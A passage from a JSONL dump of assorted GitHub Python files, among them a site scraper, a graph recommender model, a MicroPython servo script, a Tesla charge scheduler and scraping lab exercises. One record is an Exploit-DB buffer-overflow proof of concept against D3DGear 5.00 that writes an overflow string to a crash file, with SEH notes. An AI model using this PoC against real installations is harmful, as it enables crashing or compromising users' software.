\"Жанры:\":\n\t\t\t\t\t\titems.pop(0)\n\t\t\t\t\tvalue.append(tag_name)\n\t\t\t\t\tfor tag in items:\n\t\t\t\t\t\tif value[0] == \"Жанры:\":\n\t\t\t\t\t\t\ta = tag.select('a')\n\t\t\t\t\t\t\tif a:\n\t\t\t\t\t\t\t\ttext.append([a[0].text, a[0].get('href').split('/')[-2]])\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\ttext.append([tag.text])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\ttext_in_tag = tag.text\n\t\t\t\t\t\t\tif text_in_tag:\n\t\t\t\t\t\t\t\ttext.append(text_in_tag)\n\t\t\t\t\tvalue.append(text)\n\t\t\t\tif value[0] == \"Жанры:\":\n\t\t\t\t\tout['genre'] = value[1]\n\t\t\t\t\tcontinue\n\t\t\t\tblocks.append(value)\n\t\t\tout['blocks'] = blocks\n\t\tfdownloads = dle_content[0].select('#fdownloads')\n\t\tif fdownloads:\n\t\t\tfrelated = fdownloads[0].select('.frelated .tc-item')\n\t\t\tif frelated:\n\t\t\t\trelated_list = list()\n\t\t\t\tfor i in frelated:\n\t\t\t\t\trelated_data = {}\n\t\t\t\t\trelated_poster = i.select('img')\n\t\t\t\t\tif related_poster:\n\t\t\t\t\t\trelated_poster = related_poster[0].get('src').replace('/thumbs/', '/')\n\t\t\t\t\t\trelated_data['poster'] = (related_poster if related_poster.startswith('//') else HentaizLink[:-1]+related_poster)\n\t\t\t\t\trelated_title = i.select('.tc-title')\n\t\t\t\t\tif related_title:\n\t\t\t\t\t\trelated_data['ru_title'] = related_title[0].text\n\t\t\t\t\trelated_data['id'] = i.get('href').split('/')[-1].split('.')[0]\n\t\t\t\t\trelated_list.append(related_data)\n\t\t\t\tif related_list:\n\t\t\t\t\tout['related'] = related_list\n\t\tout['service_title'] = ModuleTitle\n\t\tout['horny'] = hentai\n\t\treturn {\n\t\t\t'status':200,\n\t\t\t'data': out,\n\t\t}\n\telse:\n\t\treturn {\n\t\t\t'status': response.status_code,\n\t\t\t'message': messages.get('not_response'),\n\t\t}","repo_name":"Semolik/AnimePlayer","sub_path":"api/hentaiz.py","file_name":"hentaiz.py","file_ext":"py","file_size_in_byte":13800,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"23528437695","text":"import torch\nimport torch.nn.functional as F\nfrom torch_geometric.nn import GCNConv\n\n\nfrom .base import GraphRecsysModel\n\n\nclass GCNRecsysModel(GraphRecsysModel):\n def __init__(self, **kwargs):\n super(GCNRecsysModel, self).__init__(**kwargs)\n\n def _init(self, **kwargs):\n self.if_use_features = kwargs['if_use_features']\n self.dropout = kwargs['dropout']\n\n if not self.if_use_features:\n self.x = torch.nn.Embedding(kwargs['dataset']['num_nodes'], kwargs['emb_dim'], max_norm=1).weight\n else:\n raise NotImplementedError('Feature not implemented!')\n self.x, self.edge_index = self.update_graph_input(kwargs['dataset'])\n\n self.conv1 = GCNConv(kwargs['emb_dim'], kwargs['hidden_size'])\n self.conv2 = GCNConv(kwargs['hidden_size'], kwargs['repr_dim'])\n\n self.fc1 = torch.nn.Linear(2 * kwargs['repr_dim'], kwargs['repr_dim'])\n self.fc2 = torch.nn.Linear(kwargs['repr_dim'], 1)\n\n def reset_parameters(self):\n if not self.if_use_features:\n torch.nn.init.uniform_(self.x, -1.0, 1.0)\n self.conv1.reset_parameters()\n self.conv2.reset_parameters()\n torch.nn.init.uniform_(self.fc1.weight, -1.0, 1.0)\n torch.nn.init.uniform_(self.fc2.weight, -1.0, 1.0)\n\n def forward(self):\n x = F.relu(self.conv1(self.x, self.edge_index))\n x = F.dropout(x, p=self.dropout, training=self.training)\n x = self.conv2(x, self.edge_index)\n x = F.normalize(x)\n return x\n","repo_name":"356255531/graph_recsys_benchmark","sub_path":"graph_recsys_benchmark/models/gcn.py","file_name":"gcn.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"32577151158","text":"#!/usr/bin/python\n\n#\n# Exploit Author: bzyo\n# Twitter: @bzyo_\n# Exploit Title: D3DGear 5.00 Build 2175 - Buffer Overflow\n# Date: 07-11-2017\n# Vulnerable Software: D3DGear 5.00 Build 2175\n# Vendor Homepage: http://www.d3dgear.com/\n# Version: 5.00 Build 2175\n# Software Link: http://www.d3dgear.com/products.htm\n# Tested On: Windows 7 x86\n#\n#\n# PoC: generate crash.txt, open program, select broadcast, paste crash.txt contents in stream key\n#\n# app crashes; 00420042 Pointer to next SEH record; no eip overwrite; one unicode ppr pointer\n#\n\nfile = \"crash.txt\"\n\nbuffer = \"A\"* 1284 + \"B\"*4\nwriteFile = open (file, \"w\")\nwriteFile.write( buffer )\nwriteFile.close()","repo_name":"ryanmrestivo/red-team","sub_path":"_Resources/Exploit DB 2021-12-11/exploits/windows/dos/43410.py","file_name":"43410.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"3945961483","text":"import machine\nimport utime\nfrom machine import Pin, PWM\n\nservo = PWM(Pin(0))\nservo.freq(50)\nsensor = machine.Pin(28, machine.Pin.IN, machine.Pin.PULL_DOWN)\nled = machine.Pin(15, machine.Pin.OUT)\n\ndef pin_handler(pin):\n utime.sleep_ms(100)\n if pin.value():\n print(\"detected\")\n servo.duty_u16(6500)\n utime.sleep(3)\n servo.duty_u16(8200)\n utime.sleep(0.5) \n \n\nsensor.irq(trigger=machine.Pin.IRQ_RISING, handler=pin_handler)\n\nwhile True:\n led.toggle()\n utime.sleep(5)","repo_name":"Yichen-Hsu/02_AIOT","sub_path":"00_RaspPico_Basic/Ch7_SwipeArm_Control.py","file_name":"Ch7_SwipeArm_Control.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20310315555","text":"# Escribe una función que requiera una cantidad indefinida deargumentos. Lo que hará esta función es devolver True si enalgún momento se ha ingresado al numero cero repetido dosveces consecutivas.\n# Por ejemplo:(5,6,1,0,0,9,3,5) >>> True(6,0,5,1,0,3,0,1) >>> False\n\ndef ceros_vecinos(*args):\n\n contador = 0\n\n for num in args:\n\n if contador + 1 == len(args):\n return False\n elif args[contador] == 0 and args[contador + 1] == 0:\n return True\n else:\n contador += 1\n\n return False\n\n\nprint(ceros_vecinos(5, 6, 3, 6, 2, 7, 9, 5, 9, 0))\n","repo_name":"dmontenegroh/pythonCurso","sub_path":"Dia_5/Ejercicio_3.py","file_name":"Ejercicio_3.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32707352710","text":"#!/usr/bin/env python3\nimport itertools\nimport utils\nfrom typing import NamedTuple, Set\n\nSIMILARITY_FACTOR = 12\n\n\nclass Position(NamedTuple):\n x: int\n y: int\n z: int\n\n def __str__(self):\n return f\"({self.x}, {self.y}, {self.z})\"\n\n def __repr__(self):\n return str(self)\n\n def change_facing(self, n):\n if n == 0:\n return self\n elif n == 1:\n return Position()\n\n def with_scanner_facing(self, n):\n if n == 0:\n return self\n elif n == 1:\n return Position(x=self.x, y=-self.y, z=-self.z)\n elif n == 2:\n return Position(x=self.y, y=-self.x, z=self.z)\n elif n == 3:\n return Position(x=-self.y, y=self.x, z=self.z)\n elif n == 4:\n return Position(x=self.x, y=self.z, z=-self.y)\n elif n == 5:\n return Position(x=self.x, y=-self.z, z=self.y)\n else:\n raise ValueError(f\"bad facing: {n}\")\n\n def with_scanner_rotation(self, n):\n if n == 0:\n return self\n elif n == 1:\n return Position(x=self.z, y=self.y, z=-self.x)\n elif n == 2:\n return Position(x=-self.x, y=self.y, z=-self.z)\n elif n == 3:\n return Position(x=-self.z, y=self.y, z=self.x)\n else:\n raise ValueError(f\"bad rotation: {n}\")\n\n def translate(self, dx, dy, dz):\n return Position(x=self.x + dx, y=self.y + dy, z=self.z + dz)\n\n def distance(self, p2):\n return abs(p2.x - self.x) + abs(p2.y - self.y) + abs(p2.z - self.z)\n\n\nclass Scanner(NamedTuple):\n id: int\n beacons: Set[Position]\n\n\ndef orientations(beacons):\n for f in range(6):\n for r in range(4):\n yield [p.with_scanner_facing(f).with_scanner_rotation(r) for p in beacons]\n\n\ndef try_merge(existing_beacons, beacons):\n for orientation in orientations(beacons):\n for existing_beacon in existing_beacons:\n for candidate_beacon in orientation:\n dx = existing_beacon.x - candidate_beacon.x\n dy = existing_beacon.y - candidate_beacon.y\n dz = existing_beacon.z - candidate_beacon.z\n\n total = 0\n for point in orientation:\n if not point.translate(dx, dy, dz) in existing_beacons:\n continue\n\n total += 1\n if total >= SIMILARITY_FACTOR:\n result = existing_beacons.copy()\n result.update(p.translate(dx, dy, dz) for p in orientation)\n return result, Position(dx, dy, dz)\n return None, None\n\n\ndef parse(f):\n scanner_id = None\n beacons = set()\n for line in f:\n line = line.strip()\n if \"---\" in line:\n if beacons:\n yield Scanner(scanner_id, set(beacons))\n scanner_id = int(line.replace(\"--- scanner \", \"\").replace(\"---\", \"\"))\n beacons = set()\n elif line:\n x, y, z = line.split(\",\")\n beacons.add(Position(int(x), int(y), int(z)))\n if beacons:\n yield Scanner(scanner_id, set(beacons))\n\n\ndef main():\n scanners = list(parse(utils.input()))\n current_beacons = scanners.pop(0).beacons\n scanner_positions = [Position(0, 0, 0)]\n while scanners:\n candidate = scanners.pop(0)\n updated_beacons, scanner_position = try_merge(current_beacons, candidate.beacons)\n if updated_beacons:\n current_beacons = updated_beacons\n scanner_positions.append(scanner_position)\n print(f\"merged {candidate.id} (scanner at {scanner_position})\", end=\", \")\n else:\n scanners.append(candidate)\n print(f\"failed to merge {candidate.id}\", end=\", \")\n print(f\"{len(scanners)} remaining, {len(current_beacons)} points known\")\n\n max_distance = max(p1.distance(p2) for p1, p2 in itertools.combinations(scanner_positions, 2))\n print(f\"max scanner distance: {max_distance}\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"technocoreai/aoc2021","sub_path":"aoc19.py","file_name":"aoc19.py","file_ext":"py","file_size_in_byte":4054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40820927848","text":"\n## Somu - Lab 03 - 09th Nov 2019\n# Excercise 1\nimport requests\nfrom bs4 import BeautifulSoup\nimport csv\n\npage = requests.get(\"http://dataquestio.github.io/web-scraping-pages/simple.html\")\nprint (page)\nprint (\"-------------\")\nprint (page.content)\n\n# Excercise 2\nsoup1 = BeautifulSoup(page.content,'html.parser')\nprint('----------')\nprint (soup1.tr)\n\n# Excercise 3\nwith open(\"Lab01 - carviewer.html\") as fp:\n soup = BeautifulSoup(fp,'html.parser')\nprint (soup.tr)\n\n# Excercise 4\nwith open(\"Lab01 - carviewer.html\") as fp:\n soup = BeautifulSoup(fp,'html.parser')\nprint (soup.tr)\n\n# Excercise 5\nrows = soup.findAll(\"tr\")\nfor row in rows:\n print(\"-----------\")\n print(row)\n\n# Excercise 6\nfor row in rows:\n cols = row.findAll(\"td\")\n for col in cols:\n print(col.text)\n\n# Excercise 7\ndataList = []\nfor col in cols:\n dataList.append(col.text)\n print (dataList)\n\n# Excercise 8\nemployee_file = open('employee_file.csv', mode='w')\nemployee_writer = csv.writer(employee_file,delimiter=',',quotechar='\"',quoting=csv.QUOTE_MINIMAL)\nemployee_writer.writerow(['John','Accounting','November'])\nemployee_writer.writerow(['Eric','IT','March'])\nemployee_file.close()\n\n# Excercise 9\nwith open(\"Lab01 - carviewer.html\") as fp:\n soup = BeautifulSoup(fp,'html.parser')\nemployee_file = open('week02data.csv', mode='w')\nemployee_writer = csv.writer(employee_file,delimiter=',',quotechar='\"',quoting=csv.QUOTE_MINIMAL)\n\nrows=soup.findAll(\"tr\")\nfor row in rows:\n cols = row.findAll(\"td\")\n dataList = []\n for col in cols:\n if col.text not in (\" delete\",\" update\"):\n dataList.append(col.text)\n employee_writer.writerow(dataList)\nemployee_file.close()\n\n# Excercise 10\n## introduced if statement to check for the text delete and Update\n\n# Excercise 11 and 12\npage = requests.get(\"https://www.myhome.ie/residential/mayo/property-for-sale?page=1\")\nsoup = BeautifulSoup(page.content,'html.parser')\nprint (soup.prettify())\n\n# Excercise 13 and 14\nlistings = soup.find(\"div\", class_=\"PropertyListingCard\")\nprint(listings)\n\n# Excercise 15\nprice = listings.find(class_=\"PropertyListingCard__Price\").text\nprint(price)\n\n# Excercise 16\nAddress = listings.find(class_=\"PropertyListingCard__Address\").text\nprint(Address)\n\n# Excercise 17\n\nlistings = soup.findAll(\"div\", class_=\"PropertyListingCard\")\n\nfor listing in listings:\n entry = []\n price = listing.find(class_=\"PropertyListingCard__Price\").text\n entry.append(price)\n address = listing.find(class_=\"PropertyListingCard__Address\").text\n entry.append(address)\n print(entry)\n\n# Excercise 18\n\npage = requests.get(\"https://www.myhome.ie/residential/mayo/property-for-sale?page=1\")\nsoup = BeautifulSoup(page.content,'html.parser')\n\nhome_file = open('week03Myhome.csv', mode='w')\nhome_writer = csv.writer(home_file,delimiter=',',quotechar='\"',quoting=csv.QUOTE_MINIMAL)\n\nlistings = soup.findAll(\"div\", class_=\"PropertyListingCard\")\n\nfor listing in listings:\n entry = []\n price = listing.find(class_=\"PropertyListingCard__Price\").text\n entry.append(price)\n address = listing.find(class_=\"PropertyListingCard__Address\").text\n entry.append(address)\n\n home_writer.writerow(entry)\nhome_file.close()\n\n \n\n\n\n\n\n\n\n\n\n","repo_name":"SomanathanSubramaniyan/Data-Representation","sub_path":"Week03/Lab03.py","file_name":"Lab03.py","file_ext":"py","file_size_in_byte":3213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20449385777","text":"#!/usr/bin/env python3\n\"\"\"\nSpecificity\n\"\"\"\n\nimport numpy as np\n\n\ndef specificity(confusion):\n \"\"\"\n Function that calculates the specificity\n for each class in a confusion matrix\n \"\"\"\n true = np.diagonal(confusion)\n m_total = np.sum(confusion)\n array_m_total = np.full_like(confusion[0], m_total)\n cross_1 = np.sum(confusion, axis=0)\n cross_2 = np.sum(confusion.T, axis=0)\n true_neg = array_m_total + true - cross_1 - cross_2\n fp = cross1 - true\n spec = true_neg / (fp + true_neg)\n return spec\n","repo_name":"nildiert/holbertonschool-machine_learning","sub_path":"supervised_learning/0x04-error_analysis/3-specificity.py","file_name":"3-specificity.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42817093456","text":"from dotenv import load_dotenv\nimport os\nfrom datetime import datetime, timezone, timedelta\nimport logging\nfrom logging.handlers import RotatingFileHandler\nimport asyncio\nfrom tesla_api import TeslaApiClient\nfrom nordpool import elspot\nimport time\n\n# Get the basic logging set up\nlogger = logging.getLogger(__name__)\nlog_folder = os.path.dirname(os.path.abspath(__file__))\nlog_file = os.path.join(log_folder, 'teslapower.log')\nlogger.setLevel(logging.INFO)\nfile_handler = RotatingFileHandler(log_file, maxBytes=102400, backupCount=2)\nformatter = logging.Formatter(\n '%(asctime)s %(levelname)s: %(message)s', '%Y-%m-%d %H:%M:%S')\nfile_handler.setFormatter(formatter)\nlogger.addHandler(file_handler)\n\nlogger.info('*** TeslaPowerSetting starting ***')\n\n# First set some basic config\nload_dotenv()\ntesla_token = os.getenv(\"TESLA_TOKEN\")\ntesla_user = os.getenv(\"TESLA_USER\")\ntesla_password = os.getenv(\"TESLA_PASS\")\nhome_lat = os.getenv(\"HOME_LAT\")\nhome_long = os.getenv(\"HOME_LONG\")\nwork1_lat = os.getenv(\"WORK1_LAT\")\nwork1_long = os.getenv(\"WORK1_LONG\")\nwork2_lat = os.getenv(\"WORK2_LAT\")\nwork2_long = os.getenv(\"WORK2_LONG\")\nbase_currency = os.getenv(\"BASE_CURRENCY\")\nmin_percent = os.getenv(\"MIN_PERCENT\")\nmax_percent = os.getenv(\"MAX_PERCENT\")\n# Nordpool prices are per currency/MWh where household expenses are normally currency/kWh - so set threshold as 1000x\ncheap_threshold = float(os.getenv(\"CHEAP_THRESHOLD\", \"0\"))\n\n\n# Handle non-defined values\nif not min_percent:\n min_percent = 60\nif not max_percent:\n max_percent = 90\nif not base_currency:\n base_currency = 'DKK'\n\nareas = ['DK2'] # currently only supports 1 area\nprice_ext = base_currency + '/MWh'\n\n\ndef get_prices():\n '''Function to get the prices from the Nordpool module'''\n # Nordpool module returns times as UTC, generate a 'now' to compare with\n # If this runs too early in the day, the prices may not be set for tomorrow yet (will be 'inf' as float) -- seems the price is announced around 1pm CET\n now = datetime.now(tz=timezone.utc)\n today = now.date()\n tomorrow = now.date() + timedelta(days=1)\n # Then get the power price in desired currency - both for today and tomorrow\n logger.info('Grabbing the updated prices...')\n prices_spot = elspot.Prices(currency=base_currency)\n prices_today = prices_spot.hourly(end_date=today, areas=areas)[\n 'areas'][areas[0]]['values']\n prices_tomorrow = prices_spot.hourly(end_date=tomorrow, areas=areas)[\n 'areas'][areas[0]]['values']\n logger.debug(f'prices_today: {prices_today}')\n logger.debug(f'prices_tomorrow: {prices_tomorrow}')\n return prices_today, prices_tomorrow\n\n\ndef determine_better_price(tonight, tomorrow=None):\n '''Function to determine the best charge time and charge level base on the available prices.'''\n better_price_tomorrow = False\n if tomorrow[0]['value'] == float('inf') or tomorrow is None:\n price_tonight = tonight[-1]['value']\n logger.info(\n f'Only today\\'s price is available ({price_tonight} {price_ext}).')\n else:\n price_tonight = tomorrow[0]['value']\n price_tomorrow = tomorrow[-1]['value']\n logger.info(\n f'Tomorow\\'s prices ({price_tomorrow} {price_ext}) are available and will be used to compare against today\\'s prices ({price_tonight} {price_ext}).')\n if price_tomorrow * 1.05 < price_tonight:\n # If the price for tomorrow night is better, then let's utilise that instead! (adding 5% to tomorrow's price in case they are almost even)\n better_price_tomorrow = True\n logger.info(\n f'The best price is tomorrow night: {price_tomorrow} (+5%: {price_tomorrow * 1.05}) {price_ext}.')\n else:\n logger.info(\n f'The best price is tonight: {price_tonight} {price_ext}.')\n return better_price_tomorrow, price_tonight\n\n# Thoughts\n# - ideally, we want tomorrow's prices because it will have both the price of tonight (midnight) and tomorrow night (11pm)\n# - as a backup, we can use today's prices, because it will have the price tonight (11pm) and the useless one: yesterday night (midnight between yesterday and today)\n# -- Conclusion: So there are two interesting prices and one back up price:\n# --- #1: The price tonight -- which is prices_tomorrow[0]\n# --- #2: The price tomorrow night -- which is prices_tomorrow[-1]\n# --- #3: The price tonight (1 hr earlier) -- which is prices_today[-1]\n\n# So the logic should be as follows:\n# 1) If the car is set >90% charge limit -> do nothing, we're in Trip Mode™\n# 2) If the car is set to <= 90% charge limit -> decide whether to charge much (max_percent) or little (min_percent)\n# 2a) If the price is below threshold tonight -> set charge to max_percent\n# 2a*) unless it's even lower tomorrow?\n\n\ndef get_charge_target():\n '''Function to determine desired charge target - doesnt look at Trip Mode'''\n prices_today, prices_tomorrow = get_prices()\n better_price_tomorrow, price_tonight = determine_better_price(\n prices_today, prices_tomorrow)\n if price_tonight < cheap_threshold and better_price_tomorrow == False:\n # If power is cheap, we're not in trip mode and the price is not even better tomorrow\n logger.info('Wow, cheap price tonight! ' +\n str(price_tonight) + \" \" + str(price_ext))\n return max_percent\n else:\n # Otherwise return the min percentage\n return min_percent\n\n\nasync def main():\n '''Call the Tesla API, get the car, get the charge limit, and set the desired charge taget if not in Trip Mode'''\n charge_target = int(get_charge_target())\n client = TeslaApiClient(email=tesla_user,\n password=tesla_password, token=tesla_token)\n vehicles = await client.list_vehicles()\n\n # TODO: I only have Tesla so far, so being lazy. :) -- fix if/when relevant\n car = vehicles[0]\n\n # Let's set a timeout of 10 mins, then we give up\n timeout = time.time() + 60*10\n while not car.state.lower() == 'online':\n if time.time() > timeout:\n logger.info(f'Timeout of {timeout} seconds reached, giving up...')\n break\n logger.info(f'The car is not currently awake, wake-up signal sent.')\n await car.wake_up()\n time.sleep(15)\n vehicles = await client.list_vehicles()\n car = vehicles[0]\n\n current_charge_limit = (await car.charge.get_state())['charge_limit_soc']\n # If charge limit is 90 or less, we're not in Trip Mode™\n if current_charge_limit <= 90:\n logger.info(\n f'The current charge limit was {current_charge_limit} %, setting it to {charge_target} % (no Trip Mode detected).')\n await car.charge.set_charge_limit(charge_target)\n else:\n logger.info(\n f'Trip Mode detected, so leaving the car with {current_charge_limit} % charge limit.')\n\n await client.close()\n\n\nif __name__ == '__main__':\n asyncio.run(main())\n logger.info('*** TeslaPowerSetting ended gracefully ***')\n","repo_name":"Antra/PyTeslaPowerSet","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7021,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"14036939562","text":"from e2etests.tests.test_base import BaseTest\n\n\nclass UserCannotSeePagesBeforeLoginToApplication(BaseTest):\n def test_user_cannot_see_pages_before_login_to_application(self):\n self.open_login_page()\n\n actual_error_message = self.open_incorrect_url('/delete_all_tasks').read_error_message()\n\n expected_error_message = 'You should be logged in to see that page. Please go to Login page or to Sign up page!'\n\n self.assertEqual(expected_error_message, actual_error_message,\n 'Error message is not displayed after incorrect redirection')\n","repo_name":"adrianashymoniak/TaskBoard","sub_path":"e2etests/tests/test_user_cannot_see_pages_before_login_to_application.py","file_name":"test_user_cannot_see_pages_before_login_to_application.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20606662095","text":"import re\nimport requests\nfrom datetime import datetime, timedelta\n\nfrom supybot import utils, plugins, ircutils, callbacks\nfrom supybot.commands import *\ntry:\n from supybot.i18n import PluginInternationalization\n _ = PluginInternationalization('Stocks')\nexcept ImportError:\n # Placeholder that allows to run the plugin on a bot\n # without the i18n module\n _ = lambda x: x\n\nclass Stocks(callbacks.Plugin):\n \"\"\"Provides access to stocks data\"\"\"\n threaded = True\n\n def get_symbol(self, irc, session, symbol):\n api_key = self.registryValue('alphavantage.api.key')\n if not api_key:\n irc.error('Missing API key, ask the admin to get one and set '\n 'supybot.plugins.Stocks.alphavantage.api.key', Raise=True)\n\n try:\n return session.get('https://www.alphavantage.co/query?function=GLOBAL_QUOTE&symbol={symbol}&apikey={api_key}'.format(symbol=symbol,\n api_key=api_key)).json()\n except Exception:\n raise\n\n\n def get_message(self, irc, session, symbol):\n # Do regex checking on symbol to ensure it's valid\n if not re.match(r'^[\\w^=:.\\-]{1,10}$', symbol):\n irc.errorInvalid('symbol', symbol, Raise=True)\n\n # Get data from API\n data = self.get_symbol(irc, session, symbol)\n\n if not data:\n irc.error(\"{symbol}: An error occurred.\".format(symbol=symbol), Raise=True)\n\n if 'Error Message' in data.keys():\n irc.error(\"{symbol}: {message}\".format(symbol=symbol, message=data['Error Message']), Raise=True)\n\n symbol = data['Global Quote']['01. symbol']\n # open = data['Global Quote']['02. open']\n # high = data['Global Quote']['03. high']\n # low = data['Global Quote']['04. low']\n price = float(data['Global Quote']['05. price'])\n # volume = data['Global Quote']['06. volume']\n # latest_trading_day = data['Global Quote']['07. latest trading day']\n # previous_close = data['Global Quote']['08. previous close']\n change = float(data['Global Quote']['09. change'])\n change_percent = float(data['Global Quote']['10. change percent'].strip('%'))\n\n message = (\n '{symbol} {price:g} '\n )\n\n if change >= 0.0:\n message += ircutils.mircColor('\\u25b2 {change:g} ({change_percent:g}%)', 'green')\n else:\n message += ircutils.mircColor('\\u25bc {change:g} ({change_percent:g}%)', 'red')\n\n message = message.format(\n symbol=ircutils.bold(symbol),\n price=price,\n change=change,\n change_percent=change_percent,\n )\n\n return message\n\n @wrap([many('something')])\n def stock(self, irc, msg, args, symbols):\n \"\"\" [ [ ...]]\n\n Returns stock data for single or multiple symbols\"\"\"\n\n max_symbols = self.registryValue('alphavantage.maxsymbols')\n count_symbols = len(symbols)\n\n if count_symbols > max_symbols:\n irc.error(\"Too many symbols. Maximum count {}. Your count: {}\".format(max_symbols, count_symbols), Raise=True)\n\n with requests.Session() as session:\n messages = map(lambda symbol: self.get_message(irc, session, symbol), symbols)\n\n irc.replies(messages, joiner=' | ')\n\nClass = Stocks\n\n\n# vim:set shiftwidth=4 softtabstop=4 expandtab textwidth=79:\n","repo_name":"progval/Supybot-plugins","sub_path":"Stocks/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":3405,"program_lang":"python","lang":"en","doc_type":"code","stars":107,"dataset":"github-code","pt":"21"} +{"seq_id":"14353549963","text":"# Notebook edition (link to original of the reference blogpost [link]\n# (https://huggingface.co/blog/how-to-train)).\n\nfrom tokenizers import ByteLevelBPETokenizer\nfrom tokenizers.processors import BertProcessing\nfrom transformers import RobertaConfig, RobertaTokenizer\nfrom transformers import RobertaForMaskedLM\nfrom transformers import LineByLineTextDataset\nfrom transformers import DataCollatorForLanguageModeling\nfrom transformers import Trainer, TrainingArguments\nfrom transformers import pipeline\n\nimport torch\nimport transformers\nfrom pathlib import Path\nfrom datasets import load_dataset\nimport os\n\n\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\nprint(f\"{device} is available in torch\")\nprint(\"transformers : \", transformers.__version__)\n\npaths = [str(x) for x in Path(\"../data/transformers/Kantai\").glob(\"**/*.txt\")]\npaths = \"../data/transformers/Kantai/kant.txt\"\nprint(paths)\n\ntokenizer = ByteLevelBPETokenizer()\ntokenizer.train(\n files=paths,\n vocab_size=52000,\n min_frequency=2,\n special_tokens=[\n \"\",\n \"\",\n \"\",\n \"\",\n \"\",\n ],\n)\n\n\ntoken_dir = \"../data/transformers/Kantai/models/\"\nif not os.path.exists(token_dir):\n os.makedirs(token_dir)\ntokenizer.save_model(directory=token_dir)\n\ntokenizer = ByteLevelBPETokenizer(vocab=token_dir + \"vocab.json\", merges=token_dir + \"merges.txt\")\nprint(tokenizer.encode(\"The Critique of Pure Reason.\"))\nprint(tokenizer.encode(\"The Critique of Pure Reason.\").tokens)\n\nprint(tokenizer.encode(\"The Tokenizer.\"))\nprint(tokenizer.token_to_id(\"er\"))\n\ntokenizer._tokenizer.post_processor = BertProcessing(\n (\"\", tokenizer.token_to_id(\"\")),\n (\"\", tokenizer.token_to_id(\"\")),\n)\ntokenizer.enable_truncation(max_length=512)\n\n\nconfig = RobertaConfig(\n vocab_size=52000,\n max_position_embeddings=514,\n num_attention_heads=12,\n num_hidden_layers=6,\n type_vocab_size=1,\n)\nconfig.to_json_file(token_dir + \"config.json\")\nprint(config)\n\n\ntokenizer = RobertaTokenizer.from_pretrained(token_dir, max_length=512)\nmodel = RobertaForMaskedLM(config=config)\nprint(model)\nprint(\"total parameters : \", model.num_parameters())\n\nnum_params = 0\nparams = list(model.parameters())\nfor param in params:\n try:\n L2 = len(param[0])\n except TypeError:\n L2 = 1\n num_params += len(param) * L2\nprint(\"total parameters : \", num_params)\n\n\n# dataset = load_dataset(\"text\", data_files=\"../data/transformers/Kantai/kant.txt\")\n\ndataset = LineByLineTextDataset(\n tokenizer=tokenizer,\n file_path=\"../data/transformers/Kantai/kant.txt\",\n block_size=128,\n)\n\ndata_collator = DataCollatorForLanguageModeling(tokenizer=tokenizer, mlm=True, mlm_probability=0.15)\ntraining_args = TrainingArguments(\n output_dir=token_dir,\n overwrite_output_dir=True,\n num_train_epochs=1,\n per_device_train_batch_size=64,\n save_steps=10_000,\n save_total_limit=2,\n)\n\ntrainer = Trainer(\n model=model,\n args=training_args,\n data_collator=data_collator,\n train_dataset=dataset,\n)\n\ntrainer.train()\ntrainer.save_model(token_dir, overwrite=True)\n\nfill_mask = pipeline(\"fill-mask\", model=token_dir, tokenizer=token_dir)\nprint(fill_mask(\"Human thinking involves.\"))\n","repo_name":"mecha2k/py-nlp","sub_path":"src/transformers/03 KantaiBERT.py","file_name":"03 KantaiBERT.py","file_ext":"py","file_size_in_byte":3233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34130451484","text":"import cv2\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nimg = cv2.imread('woman.jpg')\nrow,cols,channels = img.shape\nsmallest = np.amin(img)\nbiggest = np.amax(img)\n\n\noutput = img.copy()\nlista = []\nfor i in range (row):\n for j in range (cols): \n lista.append(img[i][j][0])\n output[i][j] = (img[i][j]-smallest)*(255/(biggest-smallest))\n\nprint(\"min value %s max value %s\" % (smallest , biggest))\n\ncv2.imwrite('outputcell.png',output)\nsmallest = np.amin(output)\nbiggest = np.amax(output)\nprint( \"maximo:\" + str(biggest)+\"minimo\"+str(smallest))\n\ncv2.imshow('input',img)\ncv2.imshow('output',output)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\nhistr = cv2.calcHist( [img],[0],None,[256],[0,256])\nhistr2 = cv2.calcHist( [output],[0],None,[256],[0,256])\nplt.plot(histr)\nplt.plot(histr2)\nplt.show()\n#plt.hist(output.ravel(),256,[0,256]); plt.show()\n#plt.hist(img.ravel(),256,[0,256]); plt.show()\n","repo_name":"samm007aqp/crontrast_stretching","sub_path":"first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41789626614","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# @Time: 2022/10/25:14:36\n# @Author: huxb\n# @Email: hxb_086@163.com\n\nfrom jieba import lcut\nimport pandas as pd\n\n\n# 对于学历进行文本分类 0代表研究生以上 1代表本科 2专科 3高中及以下\n\n\ndef MultinomialNBModel(df):\n df_train = 